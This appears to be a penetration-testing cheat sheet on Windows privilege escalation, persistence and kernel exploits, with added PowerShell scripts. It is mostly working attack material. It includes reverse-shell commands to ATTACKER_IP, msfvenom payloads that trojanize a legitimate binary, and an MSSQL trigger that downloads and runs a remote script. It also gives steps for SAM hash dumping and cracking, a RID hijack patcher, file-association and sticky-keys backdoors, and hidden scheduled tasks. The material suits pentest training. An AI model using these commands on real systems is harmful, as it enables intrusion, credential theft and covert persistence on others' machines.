Neko

Windows Privilege Escalation and Kernel Sploits

Initial enumeration, low-hanging exploits and a list of common kernel exploits along with the versions commonly vulnerable.

I added a search bar so you can easily search for exploits. Just click "Show all", then search the version of Windows and it'll take you to the first occurrence and highlight the rest.


Last updated: May 4th, 2023

Local Enumeration

System

systeminfo <# OS name, version, build, hotfixes; compare with the kernel exploit list below #>
hostname
wmic qfe <# lists installed patches (KBs) #>
wmic logicaldisk get caption,description,providername <# list drives #>
tasklist <# running processes and PIDs #>
schtasks <# scheduled tasks #>
ps <# in PowerShell (alias of Get-Process) #>

User

whoami <# user info #>
whoami /priv <# privilege info; SeImpersonate, SeBackup, SeRestore and SeTakeOwnership are the interesting ones #>
whoami /groups <# group info #>
net user <# shows all users #>
net user <user> <# shows info for one user #>
net localgroup
net localgroup administrators <# shows administrator group members #>
icacls <file> <# check permissions on an executable #>

Network

ipconfig /all <# network info #>
arp -a <# ARP cache: hosts this machine has recently talked to #>
route print <# routing table: which networks are reachable and via which gateway #>
netstat -ano <# listening ports and connections with PIDs; -b adds program names but needs admin #>
net share <# local shares #>

Service

sc qc <service> <# service config: binary path, start type, account it runs as #>
sc query windefend <# is Defender running? #>
sc queryex type= service <# all services; note the space after "=" #>
netsh firewall show state <# legacy context; on newer systems use netsh advfirewall show allprofiles #>

Files

#Finding hidden files and alternate data streams
gci -recurse | % { gi $_.FullName -Stream * } | where Stream -ne ':$DATA'
gci -force <# includes hidden and system files #>
#Reading an alternate data stream
Get-Content -Path C:\Users\example\example -Stream example

Passwords

#Look for "password" in config-type files (case-insensitive)
findstr /si password *.txt *.ini *.config *.xml
#Find files whose names suggest credentials
dir /s *pass* *cred* *vnc* *.config
#Search every file under the current directory (slow and noisy)
findstr /spin "password" *.*
#Common password files; passwords in answer files are often Base64 (UTF-16LE with "Password" appended)
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si vnc.ini
# In Registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin (DefaultUserName / DefaultPassword)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# SNMP parameters (community strings)
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# PuTTY saved sessions (hostnames, proxy credentials)
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for the string "password" in registry values
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
#web server
#saved credentials
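Added example (PowerShell, not from this page): a decoder for the sysprep/unattend answer files listed above. When an answer file has <PlainText>false</PlainText>, the <Value> is Base64 of the UTF-16LE password with the literal word "Password" appended, which the decoder strips (the suffix "AdministratorPassword" is also stripped in case a file uses it; treat that as an assumption). The XML is constructed sample data and not from a real host; its AdministratorPassword encodes P@ssw0rd! and the AutoLogon entry is stored in plain text.

```powershell
# Constructed sample unattend.xml (not from a real host)
$sample = @'
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>UABAAHMAcwB3ADAAcgBkACEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Username>svc_deploy</Username>
        <Password>
          <Value>Plaintext1!</Value>
          <PlainText>true</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
'@

function ConvertFrom-UnattendValue([string]$Value, [string]$PlainText) {
    if ($PlainText -eq 'true' -or -not $Value) { return $Value }
    # Base64 -> UTF-16LE bytes -> string, then drop the suffix the encoder appended
    $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value))
    foreach ($suffix in 'AdministratorPassword', 'Password') {   # 'Password' is the documented one; the other is an assumption
        if ($decoded.EndsWith($suffix)) { $decoded = $decoded.Substring(0, $decoded.Length - $suffix.Length); break }
    }
    return $decoded
}

function Get-UnattendSecrets([xml]$Doc) {
    # local-name() keeps the XPath working whether or not the default namespace is declared
    foreach ($n in $Doc.SelectNodes("//*[local-name()='AdministratorPassword' or local-name()='Password']")) {
        $value = $n.SelectSingleNode("*[local-name()='Value']")
        if (-not $value) { continue }
        $plain = $n.SelectSingleNode("*[local-name()='PlainText']")
        $owner = $n.ParentNode.SelectSingleNode("*[local-name()='Username' or local-name()='Name']")
        [pscustomobject]@{
            Element  = $n.LocalName
            User     = $(if ($owner) { $owner.InnerText } elseif ($n.LocalName -eq 'AdministratorPassword') { 'Administrator' } else { '?' })
            Password = ConvertFrom-UnattendValue $value.InnerText $(if ($plain) { $plain.InnerText } else { 'false' })
        }
    }
}

# The locations from the list above plus the Unattend.xml spellings; .inf files are just grepped
$candidates = 'C:\sysprep.inf', 'C:\sysprep\sysprep.xml', 'C:\unattend.xml',
    '%WINDIR%\Panther\Unattend.xml', '%WINDIR%\Panther\Unattend\Unattend.xml',
    '%WINDIR%\Panther\Unattend\Unattended.xml', '%WINDIR%\Panther\Unattended.xml'
foreach ($c in $candidates) {
    $path = [Environment]::ExpandEnvironmentVariables($c)
    if (-not (Test-Path -LiteralPath $path)) { continue }
    if ($path -like '*.inf') { Select-String -LiteralPath $path -Pattern 'Password'; continue }
    "== $path"
    Get-UnattendSecrets ([xml](Get-Content -LiteralPath $path -Raw)) | Format-Table -AutoSize
}

"== constructed sample"
Get-UnattendSecrets ([xml]$sample) | Format-Table -AutoSize
```

Run it as any local user; the Panther files are often world-readable even when the rest of C:\Windows is locked down, which is why they are worth checking before anything that needs admin.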

Local Exploitation

Insecure Service Permissions

#look for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS for your user or a group you are in
accesschk.exe /accepteula -uwcqv <user> <service>
#note the account the service runs as (SERVICE_START_NAME); LocalSystem is the goal
sc qc <service>
sc config <service> binpath= "C:\PathTo\revshell.exe"
#stop it first (net stop <service>) if it is already running
net start <service>

Unquoted Service Path

sc qc <service>
#e.g. BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\service.exe (no quotes, spaces in the path)
#Windows tries C:\Program.exe, C:\Program Files\Unquoted.exe, C:\Program Files\Unquoted Path.exe, C:\Program Files\Unquoted Path Service\Common.exe before the real binary,
#so check write access on each directory along the way
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
copy shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start <service>

Weak Registry Permissions

sc qc <service>
#can we write the service's registry key (KEY_SET_VALUE / KEY_ALL_ACCESS)?
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<service>
reg add HKLM\SYSTEM\CurrentControlSet\Services\<service> /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
#restart the service (or reboot if it only starts at boot) so the new ImagePath is used

Always Install Elevated

#both values must be 1 (0x1); one alone is not enough
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#the .msi then installs as SYSTEM
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

SAM Files

#backup copies in the repair directory (may be stale); the live hives are locked while Windows runs
copy C:\Windows\Repair\SAM \\<IP>\<SHARE>
copy C:\Windows\Repair\SYSTEM \\<IP>\<SHARE>
#dump the NTLM hashes (pwdump.py from creddump), then crack them or pass the hash
pwdump.py SYSTEM SAM
hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt

Scheduled Tasks

#list scheduled tasks
schtasks
#retrieve the command a task runs, the account it runs as ("Run As User") and its schedule
schtasks /query /tn vulntask /fo list /v
#can we write to the script/binary the task runs?
accesschk.exe /accepteula -quvw user c:\tasks\schtask.bat
icacls c:\tasks\schtask.bat
#overwrite the script; it runs as the task's "Run As User" at the next trigger
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
#or trigger it now if the task's permissions allow it
schtasks /run /tn vulntask
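Added example (PowerShell, not from this page): one triage script for the service checks (insecure service permissions, unquoted service path, weak registry permissions), the AlwaysInstallElevated check and the scheduled-task check above, run as the low-privilege user you already are. It approximates what accesschk does by reading each object's DACL and comparing the ACEs against the SIDs in the current token; a matching Deny ACE is treated as final, which simplifies the real access check, so confirm hits with accesschk or icacls before relying on them. Function and variable names are mine.

```powershell
# SIDs in the current token: the user plus every group (Everyone, Authenticated Users, Users, ...)
$id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$MySids = @{}
foreach ($s in @($id.User) + @($id.Groups)) { $MySids[$s.Value] = $true }

# Rights that let us replace or redirect the object, plus GENERIC_ALL / GENERIC_WRITE
# (0x10000000 / 0x40000000), which some ACEs carry instead of specific rights.
# WriteData on a directory means "create files", which is what an unquoted path needs.
$FsWrite  = [int][System.Security.AccessControl.FileSystemRights]'WriteData, Delete, ChangePermissions, TakeOwnership' -bor 0x10000000 -bor 0x40000000
$RegWrite = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership' -bor 0x10000000 -bor 0x40000000

function Test-Writable {
    param([string]$Path, [switch]$Registry)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $mask = if ($Registry) { $RegWrite } else { $FsWrite }
    $prop = if ($Registry) { 'RegistryRights' } else { 'FileSystemRights' }
    $allowed = $false
    foreach ($rule in $acl.Access) {
        if ([int]$rule.PropagationFlags -band 2) { continue }   # InheritOnly: applies to children, not this object
        try { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if (-not $MySids.ContainsKey($sid)) { continue }
        if (([int]$rule.$prop -band $mask) -eq 0) { continue }
        if ($rule.AccessControlType -eq 'Deny') { return $false }  # simplification: any matching Deny wins
        $allowed = $true
    }
    return $allowed
}

function New-Finding($Name, $Issue, $Target, $RunsAs) {
    [pscustomobject]@{ Name = $Name; Issue = $Issue; Target = $Target; RunsAs = $RunsAs }
}

# Image path -> executable, quoted or not
function Get-ServiceExe([string]$PathName) {
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}
# Directories Windows probes for an unquoted path with spaces:
# C:\Program Files\Foo Bar\svc.exe is tried as C:\Program.exe, then C:\Program Files\Foo.exe, ...
function Get-UnquotedProbeDirs([string]$PathName) {
    $parts = (Get-ServiceExe $PathName) -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { Split-Path -Parent ($parts[0..($i - 1)] -join ' ') }
}

function Find-ServiceWeaknesses {
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p) { continue }
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceExe $p))
        $dir = Split-Path -Parent $exe
        if (Test-Writable $exe) { New-Finding $svc.Name 'writable service binary' $exe $svc.StartName }
        if (Test-Writable $dir) { New-Finding $svc.Name 'writable service binary directory' $dir $svc.StartName }
        if (-not $p.StartsWith('"') -and $exe -match ' ') {
            foreach ($d in (Get-UnquotedProbeDirs $p | Select-Object -Unique)) {
                if (Test-Writable $d) { New-Finding $svc.Name 'unquoted path with writable probe directory' $d $svc.StartName }
            }
        }
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        if (Test-Writable $key -Registry) { New-Finding $svc.Name 'writable service registry key (ImagePath)' $key $svc.StartName }
    }
}

function Find-TaskWeaknesses {
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $task.Actions) {
            if (-not $a.Execute) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($a.Execute.Trim('"'))
            if ($exe -notmatch '^[A-Za-z]:\\') { continue }   # only absolute paths; PATH lookups are out of scope
            if (Test-Writable $exe) { New-Finding "task:$($task.TaskPath)$($task.TaskName)" 'writable task action' $exe $task.Principal.UserId }
        }
    }
}

function Test-AlwaysInstallElevated {
    $vals = foreach ($hive in 'HKLM', 'HKCU') {
        (Get-ItemProperty -Path "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    @($vals | Where-Object { $_ -eq 1 }).Count -eq 2   # exploitable only when both hives are 1
}

$findings = @(Find-ServiceWeaknesses) + @(Find-TaskWeaknesses)
if (Test-AlwaysInstallElevated) { $findings += New-Finding 'msiexec' 'AlwaysInstallElevated set in HKLM and HKCU' 'any .msi' 'SYSTEM' }
$findings | Sort-Object Issue, Name | Format-Table -AutoSize
```

The RunsAs column is what makes a hit worth pursuing: a writable binary for a service that runs as LocalSystem is a SYSTEM shell, one that runs as a low-privileged virtual account is not. Get-ScheduledTask needs Windows 8 / Server 2012 or later; on older hosts fall back to schtasks /query /fo list /v as above.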

Bypass Upload Access Denied

#if a direct upload is refused, pull the file from your host into a directory you can write to (e.g. C:\temp)
powershell.exe -c "iwr https://192.168.49.139/nc.exe -OutFile C:\temp\nc.exe"

RunAs

#runas prompts for the password interactively, so it needs a real interactive shell; /profile loads the user's profile, /env keeps the current environment
runas /env /profile /user:<DOMAIN or PC>\Administrator "C:\temp\nc.exe -e cmd.exe ATTACKER_IP 4444"

Persistence

Accounts

Groups

#Add users to groups
#add to admins (loud)
net localgroup administrators user123 /add
#add to Backup Operators: quieter; SeBackupPrivilege bypasses the DACL, so copy SAM and SYSTEM and crack the hashes
net localgroup "Backup Operators" user123 /add
#add WinRM / PowerShell remoting access (for RDP the group is "Remote Desktop Users")
net localgroup "Remote Management Users" user123 /add

#UAC gives local accounts a filtered (non-admin) token over the network; this disables that filtering so the account gets its full token remotely
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1

#save the SAM and SYSTEM hives (needs admin or SeBackupPrivilege)
reg save hklm\system system.bak
reg save hklm\sam sam.bak

#pull them back to the attacker (e.g. the "download" command in meterpreter or evil-winrm)
download system.bak
download sam.bak

Special Privileges

#assigning privileges: export the local security policy, add the user to the wanted right under [Privilege Rights] (e.g. SeBackupPrivilege), then re-import it with secedit /import
secedit /export /cfg config.inf

#modifying the WinRM security descriptor so a non-admin user may connect via PowerShell remoting (opens a GUI dialog, so needs an interactive session)
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI

#RID Hijacking: make a low-privileged account log on as RID 500, the built-in Administrator
#list SIDs; the RID is the last component
wmic useraccount get name,sid

#HKLM\SAM is only readable as SYSTEM; psexec can run regedit as SYSTEM
PsExec64.exe -i -s regedit

#user keys live under HKLM\SAM\SAM\Domains\Account\Users\ and are named by the RID in hex (1010 = 0x3F2 -> key 000003F2)
#the effective RID is stored in the F value at offset 0x30, little-endian
#RID of Administrator in hex: 500 = 0x01F4, so the two bytes at 0x30 become F4 01
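Added example (PowerShell, not from this page): the RID hijack above done from a SYSTEM PowerShell (PsExec64.exe -s -i powershell.exe) instead of by hand in regedit. It reads the F value of the target user's key, shows the RID currently stored at offset 0x30 and only writes the patched value when -Apply is given; the RID and function names are mine.

```powershell
# Subkeys under Users are the RID as eight uppercase hex digits: 1010 -> 000003F2, 500 -> 000001F4
function Get-SamUserKey([int]$Rid) {
    'HKLM:\SAM\SAM\Domains\Account\Users\{0:X8}' -f $Rid
}

# Effective RID = the UInt16 at offset 0x30 of the binary F value, little-endian
function Get-EffectiveRid([int]$Rid) {
    $f = [byte[]](Get-ItemProperty -LiteralPath (Get-SamUserKey $Rid) -Name F -ErrorAction Stop).F
    [BitConverter]::ToUInt16($f, 0x30)
}

function Set-EffectiveRid([int]$Rid, [int]$NewRid, [switch]$Apply) {
    $key = Get-SamUserKey $Rid
    $f = [byte[]](Get-ItemProperty -LiteralPath $key -Name F -ErrorAction Stop).F
    $before = [BitConverter]::ToUInt16($f, 0x30)
    $f[0x30] = [byte]($NewRid -band 0xFF)            # 500 = 0x01F4 -> low byte F4 ...
    $f[0x31] = [byte](($NewRid -shr 8) -band 0xFF)   # ... then high byte 01
    if ($Apply) { Set-ItemProperty -LiteralPath $key -Name F -Value $f -Type Binary }
    [pscustomobject]@{ Key = $key; Before = $before; After = [BitConverter]::ToUInt16($f, 0x30); Written = [bool]$Apply }
}

# Sanity check: the built-in Administrator reports 500
Get-EffectiveRid 500

# Preview, then apply; the hijacked account gets the Administrator's token at its next logon
Set-EffectiveRid -Rid 1010 -NewRid 500
# Set-EffectiveRid -Rid 1010 -NewRid 500 -Apply
```

Run the preview first and confirm Before shows the account's own RID; if the key does not exist the RID you computed from wmic is wrong, not the offset.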

Files

#Modifying exe payloads: inject the shell into a legitimate binary; -k keeps the original program running
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

#Modify an existing shortcut to point to a script that starts the shell and then the real program
#Example calc.exe: backdoor.ps1 contains
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"
C:\Windows\System32\calc.exe
#then set the shortcut's target to
powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

#Hijacking File Associations
#HKLM\Software\Classes\<extension> (e.g. .txt): the default value is the ProgID (e.g. txtfile)
#HKLM\Software\Classes\<ProgID>\shell\open\command: the default value is the command Explorer runs, %1 being the file
#Change that default value to: powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1 %1
#(backdoor.ps1 should open %1 with the original program afterwards so the user notices nothing)
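Added example (PowerShell, not from this page): the two-hop registry lookup for a file association, with a preview/apply switch so you can see the original command before replacing it. The script path matches the page's backdoor.ps1; the function names are mine. Writing under HKLM needs admin; the same keys under HKCU\Software\Classes override HKLM for the current user only and need no elevation.

```powershell
function Get-FileAssociationCommand([string]$Extension, [string]$Root = 'HKLM:\Software\Classes') {
    # Hop 1: the extension key's default value is the ProgID (.txt -> txtfile)
    $progId = (Get-ItemProperty -LiteralPath "$Root\$Extension" -ErrorAction Stop).'(default)'
    # Hop 2: the ProgID's shell\open\command default value is what Explorer runs, %1 = the file
    $cmdKey = "$Root\$progId\shell\open\command"
    [pscustomobject]@{
        Extension  = $Extension
        ProgId     = $progId
        CommandKey = $cmdKey
        Command    = (Get-ItemProperty -LiteralPath $cmdKey -ErrorAction Stop).'(default)'
    }
}

function Set-FileAssociationBackdoor([string]$Extension, [string]$Script, [switch]$Apply) {
    $assoc = Get-FileAssociationCommand $Extension
    # keep "%1" so backdoor.ps1 can hand the file to the real program afterwards
    $new = "powershell.exe -WindowStyle hidden -File `"$Script`" `"%1`""
    if ($Apply) { Set-ItemProperty -LiteralPath $assoc.CommandKey -Name '(default)' -Value $new }
    [pscustomobject]@{ Key = $assoc.CommandKey; Before = $assoc.Command; After = $new; Written = [bool]$Apply }
}

Get-FileAssociationCommand '.txt'
Set-FileAssociationBackdoor '.txt' 'C:\Windows\System32\backdoor.ps1'            # preview only
# Set-FileAssociationBackdoor '.txt' 'C:\Windows\System32\backdoor.ps1' -Apply   # needs admin for HKLM
```

Keep a copy of the Before value; restoring it is the cleanup step, and on a real engagement the original command (typically %SystemRoot%\system32\NOTEPAD.EXE %1 for .txt) is what backdoor.ps1 should launch with %1.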

Services

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
#exe-service wraps the payload in a proper service executable; a plain exe is killed by the service control manager when it fails to report as started
#Transfer to victim
sc.exe create exampleService binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start exampleService
#We can also repoint an existing service and make it run as SYSTEM
sc.exe config exampleService binPath= "C:\windows\rev-svc2.exe" start= auto obj= "LocalSystem"

#Startup folder for the current user (runs at that user's logon)
C:\Users\<your_username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
#make rev
msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=4450 -f exe -o revshell.exe
#all-users Startup folder (runs at any user's logon; writing here needs admin)
copy revshell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
#Alternatively, the Run/RunOnce keys (HKCU = this user only; HKLM = every user, needs admin)
#    HKCU\Software\Microsoft\Windows\CurrentVersion\Run
#    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
#    HKLM\Software\Microsoft\Windows\CurrentVersion\Run
#    HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
move revshell.exe C:\Windows
#Create a REG_EXPAND_SZ value under one of the above with data pointing to revshell

#Winlogon
#HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
#Userinit and Shell values
#append a comma and the revshell path, e.g. C:\Windows\system32\userinit.exe,C:\Windows\revshell.exe (keep the original entry or logons break)

#LogonScript
#HKCU\Environment
#create UserInitMprLogonScript (REG_SZ) = revshell location; runs at this user's logon, no admin needed

#Sticky Keys: pressing Shift five times at the logon screen then opens a SYSTEM cmd
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

#Utilman: the Ease of Access button (or Win+U) at the logon screen opens a SYSTEM cmd
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

#Other Services
#Web: drop a web shell in the IIS webroot
move shell.aspx C:\inetpub\wwwroot\

#MSSQL
#in a new query window as a sysadmin login: enable xp_cmdshell
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO
#let any login impersonate sa, then add a trigger that runs our payload as sa on every insert into the table
USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];
USE HRDB
CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';

Scheduled Tasks

#Create a task that runs every minute as SYSTEM
schtasks /create /sc minute /mo 1 /tn backdoorTask /tr "c:\tools\nc64 -e cmd.exe x.x.x.x 4449" /ru SYSTEM
#We can then hide the task from schtasks and Task Scheduler by deleting its security descriptor (as SYSTEM)
PsExec64.exe -s -i regedit
#HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\backdoorTask
#Delete the SD value

RDP


Kernel Exploits

MS09-012 "Churrasco"

Affected Versions

  • Microsoft Windows 2000 Service Pack 4
  • Windows XP Service Pack 2 and Windows XP Service Pack 3
  • Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista and Windows Vista Service Pack 1
  • Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1
  • Windows Server 2008 for 32-bit Systems
  • Windows Server 2008 for x64-based Systems
  • Windows Server 2008 for Itanium-based Systems

Reliable Exploits

MS10-015 "KiTrap0D"

Affected Versions

  • Windows Server 2003, Windows Server 2008, 7, XP
  • Windows 2000 Service Pack 4
  • Windows XP Service Pack 2 and Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista, Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition, Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems

Reliable Exploits

I haven't been able to find an exploit that will elevate the current shell; they all seem to spawn a new shell. If you know of one, let me know!

MS10-059 "Churraskito"

Affected Versions

  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems*
  • Windows Server 2008 R2 for Itanium-based Systems

Reliable Exploits

MS10-092 "Schelevator"

Affected Versions

  • Windows Vista Service Pack 1 and Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
  • Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
  • Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems*
  • Windows Server 2008 R2 for Itanium-based Systems

Reliable Exploits

MS11-046 "afd.sys"

Affected Versions

  • Windows XP SP3 x86
  • Windows XP Pro SP2 x64
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 SP2 x64
  • Windows Server 2003 SP2 Itanium-based Systems
  • Windows Vista SP1 x86
  • Windows Vista SP2 x86
  • Windows Vista SP1 x64
  • Windows Vista SP2 x64
  • Windows Server 2008 x86
  • Windows Server 2008 SP2 x86
  • Windows Server 2008 x64
  • Windows Server 2008 SP2 x64
  • Windows Server 2008 Itanium-based Systems
  • Windows Server 2008 SP2 Itanium-based Systems
  • Windows 7 x86
  • Windows 7 SP1 x86
  • Windows 7 x64
  • Windows 7 SP1 x64
  • Windows Server 2008 R2 x64
  • Windows Server 2008 R2 SP1 x64
  • Windows Server 2008 R2 Itanium-based Systems
  • Windows Server 2008 R2 SP1 Itanium-based Systems

Reliable Exploits

MS11-062 "NDISTAPI"

Affected Versions

  • Windows XP SP3 x86
  • Windows XP Pro SP2 x64
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 SP2 x64
  • Windows Server 2003 SP2 Itanium-based Systems

Reliable Exploits

MS11-080 "AfdJoinLeaf"

Affected Versions

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems

Reliable Exploits

MS14-002 "NDPROXY"

Affected Versions

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems

Reliable Exploits

MS14-040 "Dangling Pointer"

Affected Versions

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for 32-bit Systems[2] (2973408)
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT[3] (2961072)
  • Windows RT 8.1[1][3] (2961072)

Reliable Exploits

MS14-058 "win32k.sys"

Affected Versions

  • Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT[1] (3000061)
  • Windows RT 8.1[1] (3000061)

Reliable Exploits

MS14-070 "TCP/IP IOCTL"

Affected Versions

  • Windows Server 2003 Service Pack 2
